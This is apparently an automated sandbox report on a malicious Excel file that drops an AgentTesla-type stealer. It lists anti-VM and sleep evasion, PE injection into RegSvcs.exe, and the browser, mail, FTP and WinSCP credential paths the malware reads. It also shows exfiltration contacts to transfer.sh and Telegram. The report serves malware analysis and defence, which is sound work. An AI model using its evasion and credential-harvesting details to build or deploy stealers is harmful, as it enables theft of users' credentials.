Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Yara detected AntiVM3
Source: Yara match File source: 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: dropped.exe, 00000002.00000002.919772020.0000000002841000.00000004.00000800.00020000.00000000.sdmp, dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1200 Thread sleep time: -31989s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe TID: 1212 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe TID: 2944 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe TID: 940 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 8174 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Window / User API: threadDelayed 708 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 31989 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: dropped.exe, 00000002.00000002.919684490.0000000002771000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Jump to behavior
Source: RegSvcs.exe, 00000003.00000002.1171448504.0000000002537000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: lu<font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(04/08/2022 12:52:29)</font></font><br>L)X
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerxe
Source: RegSvcs.exe, 00000003.00000002.1171503093.0000000002581000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Time: 04/08/2022 12:58:29<br>User Name: user<br>Computer Name: 082561<br>OSFullName: Microsoft Windows 7 Professional <br>CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz<br>RAM: 8191.25 MB<br>IP Address: <br><hr><br><font color="#00b1ba"><b>[ </b>Program Manager <b>]</b> <font color="#000000">(04/08/2022 12:52:29)</font></font><br><font color="#00ba66">{Win}</font>r
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dropped.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\BINGO\BINGO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dropped.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 3.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38c70d8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.3890ab8.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.dropped.exe.38fb8f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.918109531.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.918357600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917564622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.917821418.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1170971637.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.920171454.0000000003890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000003.00000002.1171392057.00000000024D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dropped.exe PID: 1980, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2260, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 605526 Sample: 00001.LPCD2022.xls Startdate: 08/04/2022 Architecture: WINDOWS Score: 100 30 Found malware configuration 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 Antivirus / Scanner detection for submitted sample 2->34 36 18 other signatures 2->36 6 dropped.exe 1 5 2->6         started        9 EXCEL.EXE 8 9 2->9         started        13 BINGO.exe 2->13         started        15 BINGO.exe 2->15         started        process3 dnsIp4 46 Multi AV Scanner detection for dropped file 6->46 48 Machine Learning detection for dropped file 6->48 50 Writes to foreign memory regions 6->50 54 2 other signatures 6->54 17 RegSvcs.exe 13 12 6->17         started        28 transfer.sh 144.76.136.153, 443, 49171 HETZNER-ASDE Germany 9->28 24 C:\Users\user\AppData\Local\...\dropped.exe, PE32 9->24 dropped 52 Document exploit detected (creates forbidden files) 9->52 file5 signatures6 process7 dnsIp8 26 api.telegram.org 149.154.167.220, 443, 49172, 49173 TELEGRAMRU United Kingdom 17->26 22 C:\Users\user\AppData\Roaming\...\BINGO.exe, PE32 17->22 dropped 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->38 40 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 17->40 42 Tries to steal Mail credentials (via file / registry access) 17->42 44 5 other signatures 17->44 file9 signatures10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
144.76.136.153
 transfer.sh Germany
24940 HETZNER-ASDE false
149.154.167.220
 api.telegram.org United Kingdom
